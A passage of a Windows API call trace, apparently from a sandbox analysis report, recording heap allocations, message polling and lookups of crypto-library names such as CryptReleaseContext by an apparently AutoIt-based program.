| out: lpMsg=0x8cf140) returned 0 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0263.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.037] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.038] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0263.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0263.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.040] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0263.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0263.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0263.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.041] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0263.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0263.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0263.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0263.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0263.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0263.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0263.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0263.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0263.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0263.042] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.043] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.043] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.043] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0263.043] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.044] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0263.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0263.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.045] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0263.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.045] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0263.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0263.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0263.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0263.048] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0263.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0263.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 